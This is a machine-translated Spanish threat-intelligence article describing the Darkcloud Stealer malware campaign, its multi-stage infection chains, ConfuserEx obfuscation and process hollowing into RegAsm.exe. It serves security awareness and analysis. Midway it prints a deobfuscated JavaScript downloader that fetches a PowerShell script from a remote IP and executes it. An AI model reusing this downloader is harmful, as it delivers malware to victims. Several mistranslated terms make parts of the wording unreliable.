Ha surgido una sofisticada campaña de malware que roba información, utilizando técnicas de ofuscación avanzadas y múltiples vectores de infección para evadir los controles de seguridad tradicionales.
El Stealer de Darkcloud, documentado por primera vez en los recientes informes de inteligencia de amenazas, representa una evolución significativa en las tácticas cibercriminales, empleando un complejo mecanismo de entrega de múltiples etapas que comienza con archivos de archivo aparentemente inocuos y culminaciones en el despliegue de una carga útil Visual Basic 6 de Visual Basic 6 fuertemente ofuscada.
Los operadores de malware han desarrollado tres vías de infección distintas, cada una diseñada para maximizar la probabilidad de un compromiso exitoso del sistema.
Estos incluyen cadenas iniciadas por JavaScript que descargan scripts de PowerShell, archivos 7Z que contienen archivos de script de Windows con código JScript ofuscado y archivos de alquitrán que sirven como puntos de entrada alternativos.
Cada vector demuestra ingeniería social sofisticada, a menudo disfrazada de documentos comerciales legítimos o actualizaciones de software para evitar la sospecha del usuario.
Las campañas recientes observadas desde abril de 2025 indican que los actores de la amenaza han refinado significativamente su enfoque, alejándose de implementaciones basadas en autopsia previamente documentadas para marcos de ofuscación más complejos basados en .NET.
Investigadores de Palo Alto Networks identificado Este cambio como parte de una tendencia más amplia entre los cibercriminales para adoptar herramientas de desarrollo de grado empresarial para fines maliciosos, lo que hace que la detección y el análisis sean considerablemente más desafiantes para los equipos de seguridad.
El impacto del malware se extiende más allá del robo de datos tradicional, incorporando mecanismos de persistencia avanzados y características anti-análisis que le permiten operar sin ser detectados durante períodos prolongados.
La infraestructura de la campaña, que incluye servidores de comando y control que albergan múltiples scripts de PowerShell Maliciosos, sugiere una operación bien recubrida con una importante inversión de planificación y desarrollo.
Mecánica de inyección de ofuscación y inyección de procesos confusos
La sofisticación técnica de Darkcloud Stealer se hace evidente en su implementación de la ofuscación basada en confusex, un protector de aplicación .NET legítimo reutilizado para uso malicioso.
Cadena de infección de ataques recientes de Darkcloud (fuente – Palo Alto Networks)
El malware emplea múltiples capas de protección que incluyen medidas anti-manipulación, cambio de nombre de símbolos y ofuscación de flujo de control que transforma el código legible en secuencias de instrucciones incomprensibles.
El descargador de JavaScript deobfuscado revela el mecanismo de infección inicial:-
var rdfg = “c: \\ temp \\” + randomName () + “.ps1”; var fso = new ActiveXObject (“scripting.filesystemObject”); var shell = new ActiveXObject (“wscript.shell”); var http = new ActiveXObject (‘msxml2.xmlhttp’); if (dwnld (“http://176.65.142.190/blackyy/kay.ps1”, rdfg)) {exepsh (rdfg); }
Este script descarga las cargas útiles de PowerShell de los servidores Open Directory, creando archivos con nombre al azar en el directorio temporal del sistema.
El script de PowerShell posterior contiene datos codificados con Base64 y con AES que, cuando se descifran, revela otro ejecutable protegido por las características anti-manipulador de Confuserex.
La etapa final emplea el hueco del proceso, inyectando la carga útil VB6 descifrada llamada “holografías.exe” en Regasm.exe, una utilidad legítima de .NET Framework.
Esta técnica permite que el malware se ejecute dentro del contexto de un proceso confiable, evitando efectivamente muchas soluciones de seguridad de punto final.
Las cadenas críticas dentro de la carga útil utilizan el cifrado de cifrado de flujo RC4 con claves únicas, complicando aún más los esfuerzos de análisis estáticos y demostrando el compromiso de los autores con la evasión.
Equipe su SOC con el acceso completo a los últimos datos de amenazas de cualquiera. Obtenga una prueba gratuita de 14 días
